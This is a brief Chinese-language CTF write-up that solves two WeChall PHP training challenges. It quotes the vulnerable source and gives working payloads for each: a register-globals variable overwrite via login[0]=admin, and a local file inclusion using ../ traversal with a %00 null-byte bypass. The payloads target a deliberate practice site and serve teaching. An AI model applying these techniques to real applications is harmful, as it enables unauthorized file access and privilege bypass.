点击标题去往相应的题目链接。
Training: Register Globals
观察源码,发现存在变量覆盖漏洞。
# EMULATE REGISTER GLOBALS = ON
foreach ($_GET as $k => $v) { $$k = $v; }
if (isset($login))
{
echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
if (strtolower($login[0]) === 'admin') {
$chall->onChallengeSolved(GWF_Session::getUserID());
}
}
因此,传入 login[0]=admin
即可。
https://www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin
Training: PHP LFI
There is a lot of important stuff in ../solution.php, so please include and execute this file for us.
$code = '$filename = \'pages/\'.(isset($_GET["file"])?$_GET["file"]:"welcome").\'.html\';';
$code_emulate_pnb = '$filename = Common::substrUntil($filename, "\\0");'; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = 'include $filename;';
...
eval($code.$code_emulate_pnb); # eval the first line
...
if (lfiIsSafeDir($filename) === true) { eval($code2); } # Eval the second line, when safe.
...
它模拟了一个 \0
的截止符,为了能包含 solution.php ,可以利用 00 截断来 bypass 附加的 .html。
payload:https://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00
评论 (0)